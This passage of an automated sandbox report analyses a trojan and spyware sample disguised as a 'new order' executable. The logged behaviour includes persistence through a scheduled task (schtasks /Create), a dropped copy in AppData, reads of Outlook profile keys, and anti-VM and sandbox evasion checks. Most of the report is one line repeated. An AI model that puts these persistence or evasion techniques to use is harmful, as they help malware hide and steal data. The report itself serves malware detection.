                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe "C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe"
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe {path}
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmpJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe {path}Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: C:\Users\user\AppData\Roaming\aUkURZiJ.exeJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: C:\Users\user\AppData\Local\Temp\tmp8923.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@1/1
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_01
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeMutant created: \Sessions\1\BaseNamedObjects\qhBPaQtUSZKpqqGhtcCkqEcA
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.0.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.12.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 0_2_0028376A push ebp; retf 0_2_0028376B
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_00A3376A push ebp; retf 5_2_00A3376B
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_01127A37 push edi; retn 0000h5_2_01127A39
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_011EBA50 pushfd ; retf 5_2_011EBDB9
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0138E333 push eax; ret 5_2_0138E349
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeCode function: 5_2_0138D95C push eax; ret 5_2_0138D95D
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeStatic PE information: 0xAC6B97B1 [Wed Aug 31 16:45:37 2061 UTC]
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.63105429026
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.63105429026
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: \new order tricolor-6.45 tricolor-6.3 tricolor-8.1 tricolor-7.66.......exe
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: \new order tricolor-6.45 tricolor-6.3 tricolor-8.1 tricolor-7.66.......exe
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: \new order tricolor-6.45 tricolor-6.3 tricolor-8.1 tricolor-7.66.......exeJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: \new order tricolor-6.45 tricolor-6.3 tricolor-8.1 tricolor-7.66.......exeJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeFile created: C:\Users\user\AppData\Roaming\aUkURZiJ.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aUkURZiJ" /XML "C:\Users\user\AppData\Local\Temp\tmp8923.tmp
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe.2799e98.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe PID: 4252, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
